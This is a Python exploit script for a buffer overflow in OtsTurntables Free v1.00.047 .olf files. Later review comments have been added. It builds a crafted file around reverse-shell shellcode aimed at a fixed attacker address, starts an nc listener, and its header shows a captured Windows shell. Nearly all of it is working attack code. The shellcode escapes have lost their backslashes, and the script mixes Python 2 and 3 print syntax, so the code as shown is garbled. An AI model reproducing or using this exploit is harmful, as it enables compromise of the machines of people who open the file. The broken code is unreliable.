
# Title : OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit
# Published : 2010-02-16
# Author : mr_me


#!/usr/bin/python
# 
# ###################################################################
#
# OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit
# Date: 14-01-2010
# Author: mr_me
# Software Link: http://www.otsturntables.com/download-otsturntables-free/
# Version: 1.00.047
# Tested on:  Windows XP sp3
# Greetz: corelanc0d3r/jacky/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz 
# bad chars: 'x00x0axbdx0dx20'
#
# 		** For educational purposes only **
#
# ####################################################################
#
#		~! I want to go back to the matrix !~
#
# mrme@backtrack:~$ ./0wnm3.py 4444 awsome-electro.olf
#
# [+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit
# [+] Creating exploit file..
# [+] Writing 15000 bytes to awsome-electro.olf.. ph33r
# [+] Send awsome-electro.olf to your target
# [+] Waiting for a shell on port: 4444
# listening on [any] 4444 ...
# 192.168.2.19: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.10] from (UNKNOWN) [192.168.2.19] 2624
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:OtsLabsLists>
#

import sys, os

def banner():
    """Print the tool's ASCII-art banner followed by its title line.

    Each entry is written on its own line to stdout, in order; nothing is
    returned.  (The art is reproduced as found on this page.)
    """
    rows = (
        "|------------------------------------------------------------------|",
        "|                         __               __                      |",
        "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |",
        "|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |",
        "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |",
        "| ___/____/_/   ___/_/__,_/_/ /_/   __/___/__,_/_/ /_/ /_/  |",
        "|                                                                  |",
        "|-------------------------------------------------[ EIP Hunters ]--|",
        "[+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit",
    )
    # One print per row, so each row ends with a newline exactly as before.
    for row in rows:
        print(row)

# Two positional arguments are required: <port> and <filename>.  With fewer,
# show the banner plus a usage line and exit with status 1.
if len(sys.argv) <= 2:
    banner()
    print("[?] Usage: %s <port> <filename>" % sys.argv[0])
    sys.exit(1)

# Both values are taken verbatim from argv; neither is validated here
# (port is not checked to be numeric, filename is not checked for a path).
port, filename = sys.argv[1], sys.argv[2]

# windows/shell_reverse_tcp - 310 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444
 
# Payload literal described by the comment block above: windows/shell_reverse_tcp,
# stated as 310 bytes, x86/fnstenv_mov-encoded, with LHOST/LPORT fixed when it
# was generated.  Nothing in this literal is derived from the <port> argument:
# `port` is only used for the local nc listener further down, so changing it
# does not change the payload.
# NOTE(review): in this copy every escape has lost its backslash ("x6a" rather
# than a one-byte hex escape), so the literal as shown is plain ASCII text and
# is not byte-faithful to the 310-byte payload the header describes.
shell = ("x6ax48x59xd9xeexd9x74x24xf4x5bx81x73x13x47x4b"
"x25x9ax83xebxfcxe2xf4xbbx21xcexd7xafxb2xdax65"
"xb8x2bxaexf6x63x6fxaexdfx7bxc0x59x9fx3fx4axca"
"x11x08x53xaexc5x67x4axcexd3xccx7fxaex9bxa9x7a"
"xe5x03xebxcfxe5xeex40x8axefx97x46x89xcex6ex7c"
"x1fx01xb2x32xaexaexc5x63x4axcexfcxccx47x6ex11"
"x18x57x24x71x44x67xaex13x2bx6fx39xfbx84x7axfe"
"xfexccx08x15x11x07x47xaexeax5bxe6xaexdax4fx15"
"x4dx14x09x45xc9xcaxb8x9dx43xc9x21x23x16xa8x2f"
"x3cx56xa8x18x1fxdax4ax2fx80xc8x66x7cx1bxdax4c"
"x18xc2xc0xfcxc6xa6x2dx98x12x21x27x65x97x23xfc"
"x93xb2xe6x72x65x91x18x76xc9x14x08x76xd9x14xb4"
"xf5xf2x87xe3x27x90x21x23x34xc6x21x18xacx7bxd2"
"x23xc9x63xedx2bx72x65x91x21x35xcbx12xb4xf5xfc"
"x2dx2fx43xf2x24x26x4fxcax1ex62xe9x13xa0x21x61"
"x13xa5x7axe5x69xedxdexacx67xb9x09x08x64x05x67"
"xa8xe0x7fxe0x8ex31x2fx39xdbx29x51xb4x50xb2xb8"
"x9dx7excdx15x1ax74xcbx2dx4ax74xcbx12x1axdax4a"
"x2fxe6xfcx9fx89x18xdax4cx2dxb4xdaxadxb8x9bx4d"
"x7dx3ex8dx5cx65x32x4fxdax4cxb8x3cxd9x65x97x23"
"xd5x10x43x14x76x65x91xb4xf5x9a");

# The crafted .olf content is assembled front to back from fixed pieces and
# then padded, so the generated file always has the same size and consists
# mostly of repeated filler — the characteristic a scanner would key on.
# (Strings are reproduced exactly as they appear on this page.)
pieces = [
    "x41" * 900,
    "xebx06x90x90",
    "x46x79x23x01",  # CALL DWORD PTR SS:[ESP+2c]
    "x90" * 30,
    shell,
]
exploit = "".join(pieces)
# Pad with filler up to the 15000 target; the count is computed from the
# current length, exactly as the original did.
exploit += "x41" * (15000 - len(exploit))

banner()
# Main action: write the assembled content to <filename>, then block in a
# local nc listener on <port>.  The listener port is independent of the
# LPORT baked into `shell`; this script never checks that they agree.
try:
	print "[+] Creating exploit file.."
	print "[+] Writing",len(exploit),"bytes to " + filename + ".. ph33r"
	print "[+] Send " + filename + " to your target" 
	# Opened in text mode ('w'); the handle is only closed on the success path,
	# so a failed write leaves it to the interpreter to clean up.
	turntable = open(filename,'w');
	turntable.write(exploit);
	turntable.close();
	print "[+] Waiting for a shell on port: " + port
	# `port` is the operator's own argv value, interpolated unescaped into a
	# shell command string.  os.system returns nc's exit status rather than
	# raising, so a non-zero status (e.g. nc not installed) is silently ignored.
	os.system('nc -lvp ' + port) 
except:
	# NOTE(review): bare except — any exception from the open/write above
	# (nonexistent directory, bad filename, read-only target, ...) is reported
	# with this one permissions message and the real error is discarded.
	print "[-] Error: You do not have correct permissions.."